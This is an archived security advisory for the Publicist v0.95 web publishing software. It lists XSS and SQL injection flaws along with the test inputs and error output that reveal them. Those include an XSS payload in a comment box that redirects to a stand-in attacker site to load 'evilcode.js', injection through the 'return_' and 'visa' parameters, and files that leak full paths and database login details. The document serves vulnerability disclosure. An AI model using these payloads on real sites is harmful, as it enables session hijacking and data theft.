Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: b06-2424.htm

Publicist v0.95 - XSS And Full Path Errors



Publicist v0.95 - XSS And Full Path Errors
Publicist v0.95 - XSS And Full Path Errors



Publicist v0.95 =0D
=0D
Homepage:=0D
http://publicist.kau.se/ =0D 
=0D
Description:=0D
Publicist is a free web server software, created for web papers, that allows groups of people to write and publish together on the web (i.e. schools or single classes, clubs, or other groups who wish to express themselves). =0D
=0D
-------------------------------------- =0D
=0D
Exploits & Vulnerabilities: =0D
=0D
Full path and SQL Query errors: =0D
=0D
Type the following in login box: [BODY ONLOAD=alert('XSS')]=0D
and it produces: =0D
=0D
1064: You have an error in your SQL syntax near 'XSS')>'' at line 1 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html.example. com/left.php on line 63 =0D
=0D
SQL injection on return variable: http://www.example.com/info.php?id=1147443203&return_=3' =0D 
=0D
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html.publicist. kau.se/count.php on line 6 Unable to process query: You have an error in your SQL syntax near ''/info.php?id=1147443203&return_=3'', count=1' at line 1 =0D
=0D
SQL Injection on visa variable: =0D
http://www.example.com/hitlist_editorial_public_info.php?visa=dan.akerlund' =0D 
=0D
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /var/www/examplesite.com/ hitlist_editorial_public_info.php on line 73 =0D
=0D
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/examplesite.com /hitlist_editorial_public_info.php on line 74 =0D
=0D
=0D
=0D
Submiting html tags in the comment boxes produces this SQL queue error: =0D
=0D
1064: You have an error in your SQL syntax near 'evilcode'))>', c_show = '1', c_time = '1' at line 7 =0D
=0D
=0D
=0D
XSS Vulnerability: =0D
=0D
An XSS attack is possible by entering in the comment box some html code like this: =0D
=0D
[IMG SRC=javascript:window.location('http://www.evilsite.com/evilcode.js')] =0D 
=0D
It should also be noted that calling the files c_getMsg.php, c_getUser.php, count.php, display full path errors and contain mysql connect info: =0D
=0D
Example of the above errors: =0D
=0D
Warning: mysql_connect(): Access denied for user: 'example@localhost' (Using password: YES) in /var/www/html.example.com/c_getUser.php on line 2 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH